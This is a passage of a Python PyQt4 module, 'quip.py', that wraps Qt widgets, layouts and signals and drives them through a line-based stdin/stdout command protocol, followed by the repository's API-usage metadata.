os.path.isfile(path):\n fileDialogDir = os.path.dirname(path)\n return path\n else:\n return \"\"\n\n\n# See if PyQt4.5 allows me to set the options\n# Also see if I can add home and filesystem to the urls\ndef specialFileDialog(caption, directory, label, urls):\n dlg = QtGui.QFileDialog(None, caption, directory) #qt\n dlg.setFileMode(QtGui.QFileDialog.Directory) #qt\n urlsqt = [ QtCore.QUrl.fromLocalFile(u) for u in urls ] #qt\n dlg.setSidebarUrls(urlsqt) #qt\n dlg.setReadOnly(True)\n #dlg.setOptions(dlg.DontUseNativeDialog | dlg.ShowDirsOnly)\n # | dlg.ReadOnly) #qt\n # add new name line instead of file type\n dlg.setLabelText(dlg.FileType, label)\n\n l = dlg.layout()\n# lbl=QtGui.QLabel(label) #qt\n# l.itemAtPosition (3, 0).widget().hide()\n# l.addWidget(lbl, 3, 0)\n e = QtGui.QLineEdit()\n l.itemAtPosition (3, 1).widget().hide()\n l.addWidget(e, 3, 1)\n if dlg.exec_():\n path = dlg.selectedFiles()[0]\n return((True, str(path).strip(), str(e.text()).strip()))\n else:\n return ((False, None, None))\n\n\nclass Stack(QtGui.QStackedWidget): #qt\n def __init__(self):\n QtGui.QStackedWidget.__init__(self) #qt\n self.x_mywidgets = {}\n\n def x__pages(self, pages):\n for page in pages:\n pw = _Page() #qt\n self.addWidget(pw) #qt\n pw.w_name = page\n self.x_mywidgets[page] = pw\n\n def set(self, index=0):\n self.setCurrentIndex(index) #qt\n\n\nclass Notebook(QtGui.QTabWidget): #qt\n s_default = \"changed\"\n s_signals = {\n \"changed\": \"currentChanged(int)\" #qt\n }\n def __init__(self):\n QtGui.QTabWidget.__init__(self) #qt\n self.x_tabs = []\n self.x_mywidgets = {}\n\n def x__tabs(self, tabs):\n for tab in tabs:\n tname = tab[0]\n tw = _Page() #qt\n self.addTab(tw, (tab[1])) #qt\n tw.w_name = tname\n self.x_mywidgets[tname] = tw\n self.x_tabs.append([tname, tw])\n\n def set(self, index=0):\n self.setCurrentIndex(index) #qt\n\n def enableTab(self, index, on):\n self.setTabEnabled(index, on) #qt\n\nclass _Page(QtGui.QWidget): #qt\n def __init__(self): #qt\n QtGui.QWidget.__init__(self) #qt\n\n\nclass Frame(QtGui.QGroupBox, WBase): #qt\n def __init__(self):\n QtGui.QGroupBox.__init__(self) #qt\n\n def x__text(self, text):\n self.setTitle(text) #qt\n\n\nclass OptionalFrame(Frame): #qt\n s_default = \"toggled\"\n s_signals = {\n \"toggled\": \"toggled(bool)\" #qt\n }\n def __init__(self): #qt\n Frame.__init__(self) #qt\n self.setCheckable(True) #qt\n self.setChecked(False) #qt\n\n def opton(self, on):\n self.setChecked(on) #qt\n\n def enable_hack(self): #qt\n if not self.isChecked(): #qt\n self.setChecked(True) #qt\n self.setChecked(False) #qt\n\n\nclass Label(QtGui.QLabel, WBase): #qt\n def __init__(self):\n QtGui.QLabel.__init__(self) #qt\n\n def x__html(self, text):\n self.setText(text) #qt\n\n def x__image(self, path):\n self.setPixmap(QtGui.QPixmap(path)) #qt\n\n def x__align(self, pos):\n if pos == \"center\":\n a = QtCore.Qt.AlignCenter #qt\n else:\n a = QtCore.Qt.AlignRight | QtCore.Qt.AlignVCenter #qt\n self.setAlignment(a) #qt\n\n\nclass Button(QtGui.QPushButton, WBase, BBase): #qt\n s_default = \"clicked\"\n s_signals = {\n \"clicked\": \"clicked()\" #qt\n }\n def __init__(self):\n QtGui.QPushButton.__init__(self) #qt\n\n\nclass ToggleButton(QtGui.QPushButton, WBase, BBase): #qt\n s_default = \"toggled\"\n s_signals = {\n \"toggled\": \"toggled(bool)\" #qt\n }\n def __init__(self):\n QtGui.QPushButton.__init__(self) #qt\n self.setCheckable(True) #qt\n\n def set(self, on):\n self.setChecked(on) #qt\n\n\nclass CheckBox(QtGui.QCheckBox, WBase): #qt\n # A bit of work is needed to get True/False state #qt\n # instead of 0/1/2 #qt\n s_default = \"toggled\"\n s_signals = {\n \"toggled\": \"stateChanged(int)\" #qt\n }\n def __init__(self):\n QtGui.QCheckBox.__init__(self) #qt\n\n def set(self, on):\n self.setCheckState(2 if on else 0) #qt\n\n def active(self):\n return self.checkState() != QtCore.Qt.Unchecked #qt\n\n def s_toggled(self, state): #qt\n \"\"\"Convert the argument to True/False.\n \"\"\" #qt\n return (state != QtCore.Qt.Unchecked,) #qt\n\n\nclass RadioButton(QtGui.QRadioButton, WBase): #qt\n s_default = \"toggled\"\n s_signals = {\n \"toggled\": \"toggled(bool)\" #qt\n }\n def __init__(self):\n QtGui.QPushButton.__init__(self) #qt\n\n def set(self, on):\n self.setChecked(on) #qt\n\n def active(self):\n return self.isChecked() #qt\n\n\nclass ComboBox(QtGui.QComboBox, WBase): #qt\n s_default = \"changed\"\n s_signals = {\n \"changed\": \"currentIndexChanged(int)\" , #qt\n \"changedstr\": \"currentIndexChanged(const QString &)\" #qt\n }\n def __init__(self):\n QtGui.QComboBox.__init__(self) #qt\n\n def set(self, items, index=0):\n self.blockSignals(True)\n self.clear() #qt\n if items:\n self.addItems(items) #qt\n self.setCurrentIndex(index) #qt\n self.blockSignals(False)\n\n\nclass ListChoice(QtGui.QListWidget, WBase): #qt\n s_default = \"changed\"\n s_signals = {\n \"changed\": \"currentRowChanged(int)\" , #qt\n }\n def __init__(self):\n QtGui.QListWidget.__init__(self) #qt\n\n def set(self, items, index=0):\n self.blockSignals(True)\n self.clear() #qt\n if items:\n self.addItems(items) #qt\n self.setCurrentRow(index) #qt\n self.blockSignals(False)\n\n\nclass List(QtGui.QTreeWidget, WBase): #qt\n # Only using top-level items\n s_default = \"select\"\n s_signals = {\n \"select\": \"itemSelectionChanged()\" , #qt\n \"clicked\": \"itemClicked(QTreeWidgetItem *,int)\",#qt\n }\n def __init__(self):\n QtGui.QTreeWidget.__init__(self) #qt\n self.mode = \"\"\n self.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection) #qt\n self.setRootIsDecorated(False) #qt\n\n def x__selectionmode(self, sm):\n self.mode = sm\n if sm == \"None\":\n self.setSelectionMode(QtGui.QAbstractItemView.NoSelection) #qt\n elif sm == \"Single\":\n self.setSelectionMode(QtGui.QAbstractItemView.SingleSelection) #qt\n else:\n self.mode = \"\"\n self.setSelectionMode(QtGui.QAbstractItemView.ExtendedSelection) #qt\n\n def setHeaders(self, headers): #qt\n self.setHeaderLabels(headers) #qt\n\n def set(self, items, index=0): #qt\n # Note that each item must be a tuple/list containing\n # entries for each column.\n self.clear() #qt\n c = 0\n for i in items:\n item = QtGui.QTreeWidgetItem(self, i) #qt\n self.addTopLevelItem(item) #qt\n if c == index:\n self.setCurrentItem(item)\n c += 1\n\n def compact(self):\n for i in range(self.columnCount()): #qt\n self.resizeColumnToContents(i) #qt\n\n def s_select(self):\n # Signal a selection change, passing the new selection list (indexes)\n s = [self.indexOfTopLevelItem(i) for i in self.selectedItems()] #qt\n if self.mode == \"Single\":\n return s\n else:\n return (s,)\n\n def s_clicked(self, item, col): #qt\n \"\"\"This is intended for activating a user-defined editing function.\n Tests showed that this is called after the selection is changed, so\n if using this signal, use it only in 'Single' selection mode and\n use this, not 'select' to record selection changes. Clicking on the\n selected row should start editing the cell, otherwise just change\n the selection.\n \"\"\"\n ix = self.indexOfTopLevelItem(item) #qt\n return (ix, col)\n\n\nclass LineEdit(QtGui.QLineEdit, WBase): #qt\n s_default = \"changed\"\n s_signals = {\n \"enter\": \"returnPressed()\", #qt\n \"changed\": \"textEdited(const QString &)\" #qt\n }\n def __init__(self):\n QtGui.QLineEdit.__init__(self) #qt\n\n def get(self):\n return unicode(self.text()) #qt\n\n def x__ro(self, ro):\n self.setReadOnly(ro) #qt\n\n def x__pw(self, star):\n self.setEchoMode(QtGui.QLineEdit.Password if star == \"+\" #qt\n else QtGui.QLineEdit.NoEcho if star == \"-\" #qt\n else QtGui.QLineEdit.Normal) #qt\n\n\nclass CheckList(QtGui.QWidget, WBase): #qt\n def __init__(self):\n QtGui.QWidget.__init__(self) #qt\n self.box = QtGui.QVBoxLayout(self) #qt\n self.title = None\n if text: #qt\n l.addWidget(QtGui.QLabel(text)) #qt\n self.widget = QtGui.QListWidget() #qt\n l.addWidget(self.widget) #qt\n\n def x__title(self, text):\n if self.title:\n self.title.setText(text) #qt\n else:\n self.title = QtGui.QLabel(text) #qt\n self.box.insertWidget(0, self.title) #qt\n\n def checked(self, index):\n return (self.widget.item(index).checkState() == #qt\n QtCore.Qt.Checked) #qt\n\n def set(self, items):\n self.widget.blockSignals(True) #qt\n self.widget.clear() #qt\n if items:\n for s, c in items:\n wi = QtGui.QListWidgetItem(s, self.widget) #qt\n wi.setCheckState(QtCore.Qt.Checked if c #qt\n else QtCore.Qt.Unchecked) #qt\n self.blockSignals(False) #qt\n\n\nclass TextEdit(QtGui.QTextEdit, WBase): #qt\n def __init__(self):\n QtGui.QTextEdit.__init__(self) #qt\n\n def x__ro(self, ro):\n self.setReadOnly(ro) #qt\n\n def append_and_scroll(self, text):\n self.append(text) #qt\n self.ensureCursorVisible() #qt\n\n def get(self):\n return unicode(self.toPlainText()) #qt\n\n def undo(self):\n QtGui.QTextEdit.undo(self) #qt\n\n def redo(self):\n QtGui.QTextEdit.redo(self) #qt\n\n def copy(self):\n QtGui.QTextEdit.copy(self) #qt\n\n def cut(self):\n QtGui.QTextEdit.cut(self) #qt\n\n def paste(self):\n QtGui.QTextEdit.paste(self) #qt\n\n\nclass HtmlView(QtWebKit.QWebView, WBase): #qt\n def __init__(self):\n QtWebKit.QWebView.__init__(self) #qt\n\n def x__html(self, content):\n self.setHtml(content) #qt\n\n def setUrl(self, url):\n self.load(QtCore.QUrl(url)) #qt\n\n def prev(self):\n self.back() #qt\n\n def next(self):\n self.forward() #qt\n\n\nclass SpinBox(QtGui.QDoubleSpinBox, WBase): #qt\n s_default = \"changed\"\n s_signals = {\n \"changed\": \"valueChanged(double)\" #qt\n }\n def __init__(self):\n QtGui.QDoubleSpinBox.__init__(self) #qt\n self.step = None\n\n def x__min(self, min):\n self.setMinimum(min)\n\n def x__max(self, max):\n self.setMaximum(max)\n\n def x__decimals(self, dec):\n self.setDecimals(dec)\n if not self.step:\n self.setSingleStep(10**(-dec))\n\n def x__step(self, step):\n self.setSingleStep(step)\n\n def x__value(self, val):\n self.setValue(val)\n\n\nclass ProgressBar(QtGui.QProgressBar, WBase): #qt\n def __init__(self):\n QtGui.QProgressBar.__init__(self) #qt\n\n def set(self, value):\n self.setValue(value) #qt\n\n def x__max(self, max):\n self.setMaximum(max) #qt\n\n\n\n# Layout classes\nclass Layout:\n \"\"\"A mixin base class for all layout widgets.\n \"\"\"\n pass\n\nboxmargin=3\nclass _BOX(Layout):\n def __init__(self, items):\n self.setContentsMargins(boxmargin, boxmargin, boxmargin, boxmargin) #qt\n for wl in items:\n if isinstance(wl, QtGui.QWidget): #qt\n self.addWidget(wl) #qt\n elif isinstance(wl, SPACE): #qt\n if wl.size: #qt\n self.addSpacing(wl.size) #qt\n self.addStretch() #qt\n elif isinstance(wl, Layout): #qt\n self.addLayout(wl) #qt\n else: #qt\n gui_error(\"Invalid Box entry: %s\" % repr(wl))\n\n\nclass VBOX(QtGui.QVBoxLayout, _BOX): #qt\n def __init__(self, *items):\n QtGui.QVBoxLayout.__init__(self) #qt\n _BOX.__init__(self, items) #qt\n\n\nclass HBOX(QtGui.QHBoxLayout, _BOX): #qt\n def __init__(self, *items):\n QtGui.QHBoxLayout.__init__(self) #qt\n _BOX.__init__(self, items) #qt\n\n\nclass GRID(QtGui.QGridLayout, Layout): #qt\n def __init__(self, *rows):\n QtGui.QGridLayout.__init__(self) #qt\n y = -1\n for row in rows:\n if not isinstance(row, GRIDROW):\n gui_error(\"Grid layouts must be built from 'GRIDROW's ('*+*').\"\n \"\\nFound:\\n %s\" % repr(row))\n\n y += 1\n x = -1\n for wl in row.items:\n x += 1\n if isinstance(wl, Span):\n continue\n # Determine the row and column spans\n x1 = x + 1\n while (x1 < len(row.items)) and isinstance(row.items[x1], CSPAN):\n x1 += 1\n y1 = y + 1\n while (y1 < len(rows)) and isinstance(rows[y1].items[x], RSPAN):\n y1 += 1\n\n if isinstance(wl, QtGui.QWidget): #qt\n self.addWidget(wl, y, x, y1-y, x1-x) #qt\n elif isinstance(wl, Layout):\n self.addLayout(wl, y, x, y1-y, x1-x) #qt\n elif isinstance(wl, SPACE):\n self.addItem(QtGui.QSpacerItem(wl.size, wl.height),\n y, x, y1-y, x1-x) #qt\n else:\n gui_error(\"Invalid entry in Grid layout: %s\" % repr(wl))\n\n\nclass GRIDROW:\n \"\"\"It is necessary to have a layout class for a grid row because a list\n is always interpreted as being a layout item.\n \"\"\"\n def __init__(self, *items):\n self.items = items\n\n\nclass SPACE:\n \"\"\"Can be used in boxes and grids. In boxes only size is of interest,\n and it also means vertical size in the case of a vbox. In grids size\n is the width.\n \"\"\"\n def __init__(self, size_width=0, height=0): #qt\n self.size = size_width #qt\n self.height = height #qt\n\n\nclass Span:\n \"\"\"Class to group special grid layout objects together - it doesn't\n actually do anything itself, but is used for checking object types.\n \"\"\"\n pass\n\n\nclass CSPAN(Span):\n \"\"\"Column-span layout item. It doesn't do anything itself, but it is used\n by the Grid layout constructor.\n \"\"\"\n pass\n\n\nclass RSPAN(Span):\n \"\"\"Row-span layout item. It doesn't do anything itself, but it is used\n by the Grid layout constructor.\n \"\"\"\n pass\n\n\nclass HLINE(QtGui.QFrame): #qt\n def __init__(self):\n QtGui.QFrame.__init__(self) #qt\n self.setFrameShape(QtGui.QFrame.HLine) #qt\n\n\nclass VLINE(QtGui.QFrame): #qt\n def __init__(self):\n QtGui.QFrame.__init__(self) #qt\n self.setFrameShape(QtGui.QFrame.VLine) #qt\n\n\nclass Signal:\n \"\"\"Each instance represents a single connection.\n \"\"\"\n def __init__(self, source, signal, name=None):\n \"\"\"'source' is the widget object which initiates the signal.\n 'signal' is the signal type.\n If 'name' is given, the signal will get this as its name,\n and this name may be used for more than one connection.\n Otherwise the name is built from the name of the source widget and\n the signal type as 'source*signal' and may only be used once.\n If 'name' begins with '+' an additional argument, the source\n widget name, will be inserted at the head of the argument list.\n \"\"\"\n self.signame = signal\n self.tag = None\n sig = source.s_signals.get(signal)\n if not sig:\n gui_warning(\"Signal '%s' is not defined for '%s'.\"\n % (signal, source.w_name))\n return\n if name:\n l = guiapp.connections.get(name, [])\n if name.startswith(\"+\"):\n self.tag = source.w_name\n else:\n l = self\n name = \"%s*%s\" % (source.w_name, signal)\n if guiapp.connections.has_key(name):\n gui_warning(\"Signal '%s' is defined more than once.\" % name)\n return\n self.name = name\n try:\n self.convert = getattr(source, \"s_%s\" % signal)\n except:\n self.convert = None\n if QtCore.QObject.connect(source, QtCore.SIGNAL(sig), self.signal): #qt\n if l != self:\n l.append(self)\n guiapp.connections[name] = l\n else:\n gui_warning(\"Signal '%s' couldn't be connected.\" % name)\n\n def signal(self, *args):\n if self.convert:\n args = self.convert(*args)\n if self.tag:\n guiapp.sendsignal(self.name, self.tag, *args)\n else:\n guiapp.sendsignal(self.name, *args)\n\n# def disconnect(self):\n# ???\n\n\nclass GuiApp:\n \"\"\"This class represents an application gui, possibly with more than\n one top level window, these being defined in layout files.\n \"\"\"\n def __init__(self):\n global guiapp\n guiapp = self\n self.qtapp = QtGui.QApplication([]) #qt\n\n self.connections = {}\n self.widgets = {}\n\n\n def addwidget(self, fullname, wo):\n if self.widgets.has_key(fullname):\n gui_error(\"Attempted to define widget '%s' twice.\" % fullname)\n self.widgets[fullname] = wo\n\n\n def getwidget(self, w):\n widget = self.widgets.get(w)\n if not widget:\n gui_warning(\"Unknown widget: %s\" % w)\n return widget\n\n\n def show(self, windowname):\n self.getwidget(windowname).setVisible()\n\n\n def new_line(self, line):\n \"\"\"An input line has been received.\n The initial character determines the action:\n '!' - method calls to an exported widget, with no result.\n They have the form '!widget.method [arg1, arg2, ...]'\n where the argument list is json-encoded. If there are no\n arguments the square brackets needn't be present.\n '?' - similar to '!', but a return value is expected. It has\n a key value, which is everything up to the first ':' After\n that the arguments are as for '!'. The result is '@' followed\n by the key value, then ':', then the json-encoded call result.\n '%' - widget definition. The form is\n '%widget-type widget-name {attributes}', where the attribute\n dict is optional. If widget-name starts with '^' this will be\n stripped and the default signal for this widget will be enabled.\n '$' - set a layout on an existing widget. The form is\n '$ widget-name layout', where layout is in list form (see below).\n '^' - enable emission of the given signal. The form is\n '^widget-name signal-type signal-name' where signal-name is\n optional (see class Signal for details).\n \"\"\"\n line = str(line).rstrip()\n\n if line[0] == \"!\":\n # Process a method call - a command with no response\n try:\n self._methodcall(line[1:])\n except:\n onexcept(\"Bad gui command line:\\n \" + line)\n\n elif line[0] == \"?\":\n # Process a method call - an enquiry.\n try:\n l, r = line.split(\":\", 1)\n res = self._methodcall(r)\n except:\n onexcept(\"Bad gui enquiry line:\\n \" + line)\n self.send(\"@\", \"%s:%s\" % (l[1:], json.dumps(res)))\n\n elif line[0] == \"%\":\n # Add a widget\n try:\n args = line[1:].split(None, 2)\n if len(args) > 2:\n a = json.loads(args[2])\n assert isinstance(a, dict)\n else:\n a = {}\n self.newwidget(args[0], args[1], a)\n except:\n onexcept(\"Bad widget definition:\\n \" + line)\n # fatal\n\n elif line[0] == \"$\":\n # Set a widget's layout\n try:\n wn, l = line[1:].split(None, 1)\n self.layout(wn, json.loads(l))\n except:\n onexcept(\"Bad layout line:\\n \" + line)\n\n elif line[0] == \"^\":\n # Enable a signal\n args = line[1:].split()\n w = self.getwidget(args[0])\n if w:\n Signal(w, *args[1:])\n\n elif line[0] == \"/\":\n # Quit\n arg = line[1:].strip()\n self.send(\"/\", arg if arg else \"0\")\n guiapp.qtapp.quit()\n\n else:\n self.got(line)\n\n ithread.event.set()\n\n\n def _methodcall(self, text):\n wma = text.split(None, 1)\n cmd = specials_table.get(wma[0])\n if not cmd:\n w, m = wma[0].split(\".\")\n wo = self.getwidget(w)\n cmd = getattr(wo, m)\n if len(wma) > 1:\n return cmd(*json.loads(wma[1]))\n else:\n return cmd()\n\n\n def got(self, line):\n \"\"\"Reimplement this in a sub-class to do something else?\n \"\"\"\n gui_error(\"Unexpected input line:\\n \" + line)\n\n\n def send(self, mtype, line):\n \"\"\"Reimplement this in a sub-class to do something else?\n \"\"\"\n sys.stdout.write(\"%s%s\\n\" % (mtype, line))\n sys.stdout.flush()\n\n\n def sendsignal(self, name, *args):\n self.send(\"^\", name + \" \" + json.dumps(args))\n\n\n def newwidget(self, wtype, wname, args):\n if wname[0] == \"^\":\n wname = wname[1:]\n connect = True\n else:\n connect = False\n\n wobj = widget_table[wtype]()\n wobj.w_name = wname\n\n # Attributes\n for key, val in args.iteritems():\n handler = \"x__\" + key\n if hasattr(wobj, handler):\n getattr(wobj, handler)(val)\n# Unrecognized attributes are ignored ...\n\n # The widget may itself have created widgets that need including\n if hasattr(wobj, \"x_mywidgets\"):\n for n, w in wobj.x_mywidgets.iteritems():\n self.addwidget(n, w)\n if connect:\n Signal(wobj, wobj.s_default)\n self.addwidget(wname, wobj)\n\n\n def layout(self, wname, ltree):\n \"\"\"A layout call specifies and organizes the contents of a widget.\n The first argument is the name of the widget, the second argument\n is a layout manager list.\n\n There are three sorts of thing which can appear in layout manager\n lists (apart from the layout type at the head of the list and an\n optional attribute dict as second item). There can be named\n widgets, there can be further layout managers (specified as lists,\n nested as deeply as you like) and there can be layout widgets,\n like spacers and separators.\n\n A layout widget can appear in two forms - either as a simple\n string (the layout widget type), or as a list with two entries,\n the layout widget type and an attribute dict. In the former case\n all attributes take on their default values.\n \"\"\"\n wobj = self.getwidget(wname)\n assert isinstance(ltree, list)\n lobj = self.getobj(ltree)\n assert isinstance(lobj, Layout)\n wobj.setLayout(lobj) #qt\n\n\n def getobj(self, item):\n if isinstance(item, list):\n if (len(item) > 1) and isinstance(item[1], dict):\n dictarg = item[1]\n ilist = item[2:]\n else:\n dictarg = {}\n ilist = item[1:]\n if item[0].endswith(\"*\"):\n args = [self.getobj(i) for i in ilist]\n else:\n args = ilist\n return self.newlayout(item[0], dictarg, args)\n\n elif item.startswith(\"*\"):\n return self.newlayout(item, {}, [])\n\n else:\n return self.getwidget(item)\n\n\n def newlayout(self, item, parms, args):\n lfunc = layout_table.get(item)\n if lfunc:\n lobj = lfunc(*args)\n # Attributes\n for key, val in parms:\n handler = \"x__\" + key\n if hasattr(lobj, handler):\n getattr(lobj, handler)(val)\n return lobj\n else:\n gui_error(\"Unknown layout type: %s\" % item)\n\n\n#+++++++++++++++++++++++++++\n# Catch all unhandled errors.\ndef errorTrap(type, value, tb):\n etext = \"\".join(traceback.format_exception(type, value, tb))\n gui_error(etext, \"This error could not be handled.\")\n\nsys.excepthook = errorTrap\n#---------------------------\n\nwidget_table = {\n \"Window\": Window,\n \"Dialog\": Dialog,\n \"DialogButtons\": DialogButtons,\n \"Notebook\": Notebook,\n \"Stack\": Stack,\n \"Frame\": Frame,\n \"Button\": Button,\n \"ToggleButton\": ToggleButton,\n \"RadioButton\": RadioButton,\n \"CheckBox\": CheckBox,\n \"Label\": Label,\n \"CheckList\": CheckList,\n \"List\": List,\n \"OptionalFrame\": OptionalFrame,\n \"ComboBox\": ComboBox,\n \"ListChoice\": ListChoice,\n \"LineEdit\": LineEdit,\n \"TextEdit\": TextEdit,\n \"HtmlView\": HtmlView,\n \"SpinBox\": SpinBox,\n \"ProgressBar\": ProgressBar,\n}\n\nspecials_table = {\n \"textLineDialog\": textLineDialog,\n \"infoDialog\": infoDialog,\n \"confirmDialog\": confirmDialog,\n \"errorDialog\": gui_error,\n \"warningDialog\": gui_warning,\n \"fileDialog\": fileDialog,\n \"specialFileDialog\": specialFileDialog,\n}\n\nlayout_table = {\n \"*VBOX*\": VBOX,\n \"*HBOX*\": HBOX,\n \"*GRID*\": GRID,\n \"*+*\": GRIDROW,\n \"*-\": CSPAN,\n \"*|\": RSPAN,\n \"*SPACE\": SPACE,\n \"*VLINE\": VLINE,\n \"*HLINE\": HLINE,\n}\n\n\n\n#+++++++++++++++++++++++++++++++++++\n# The input handler, a separate thread.\n\n# Start input thread\nclass Input(QtCore.QThread): #qt\n def __init__(self, input, target):\n QtCore.QThread.__init__(self) #qt\n # It seems the argument must be a Qt type:\n self.lineReady = QtCore.SIGNAL(\"lineReady(QString)\") #qt\n self.input = input\n self.connect(self, self.lineReady, target) #qt\n self.event = threading.Event()\n self.event.set()\n\n def run(self):\n while True:\n line = self.input.readline()\n if not line: # Is this at all possible?\n return\n self.event.wait()\n self.event.clear()\n self.emit(self.lineReady, line) #qt\n#---------------------------\n\nif __name__ == \"__main__\":\n GuiApp()\n\n ithread = Input(sys.stdin, guiapp.new_line)\n ithread.start()\n\n guiapp.qtapp.exec_() #qt\n\n", "repo_name": "chakra-project/packages-platform", "sub_path": "uipi/quip.py", "file_name": "quip.py", "file_ext": "py", "file_size_in_byte": 39699, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "31", "api": [{"api_name": "sys.stderr.write", "line_number": 17, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 17, "usage_type": "attribute"}, {"api_name": "sys.stderr.flush", "line_number": 18, "usage_type": "call"}, {"api_name": "sys.stderr", "line_number": 18, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QFont", "line_number": 52, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 52, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 64, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 64, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 65, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 65, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 66, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 66, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 67, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 67, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QStyle", "line_number": 68, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 68, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QIcon", "line_number": 81, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 81, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 97, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 97, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QWidget.__init__", "line_number": 102, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 102, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 102, "usage_type": "name"}, {"api_name": "threading.Lock", "line_number": 105, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget.closeEvent", "line_number": 113, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QWidget", "line_number": 113, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 113, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.Qt", "line_number": 137, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 137, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 155, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 155, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog.__init__", "line_number": 157, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 157, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 157, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialog", "line_number": 160, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 160, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox", "line_number": 163, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 163, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox", "line_number": 173, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 173, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox.__init__", "line_number": 178, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QDialogButtonBox", "line_number": 178, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 178, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.SIGNAL", "line_number": 184, "usage_type": "call"}, {"api_name": "PyQt4.QtCore", "line_number": 184, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 200, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 200, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QLineEdit", "line_number": 202, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 202, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QInputDialog.getText", "line_number": 203, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QInputDialog", "line_number": 203, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 203, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.question", "line_number": 211, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 211, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 211, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 212, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 212, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 213, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 213, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.information", "line_number": 219, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 219, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 219, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.critical", "line_number": 227, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 227, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 227, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QMessageBox.warning", "line_number": 233, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QMessageBox", "line_number": 233, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 233, "usage_type": "name"}, {"api_name": "traceback.format_exc", "line_number": 236, "usage_type": "call"}, {"api_name": "PyQt4.QtGui.QFileDialog", "line_number": 246, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 246, "usage_type": "name"}, {"api_name": "os.path.isdir", "line_number": 258, "usage_type": "call"}, {"api_name": "os.path", "line_number": 258, "usage_type": "attribute"}, {"api_name": "os.path.isfile", "line_number": 260, "usage_type": "call"}, {"api_name": "os.path", "line_number": 260, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 261, "usage_type": "call"}, {"api_name": "os.path", "line_number": 261, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui.QFileDialog", "line_number": 270, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 270, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QFileDialog", "line_number": 271, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 271, "usage_type": "name"}, {"api_name": "PyQt4.QtCore.QUrl.fromLocalFile", "line_number": 272, "usage_type": "call"}, {"api_name": "PyQt4.QtCore.QUrl", "line_number": 272, "usage_type": "attribute"}, {"api_name": "PyQt4.QtCore", "line_number": 272, "usage_type": "name"}, {"api_name": 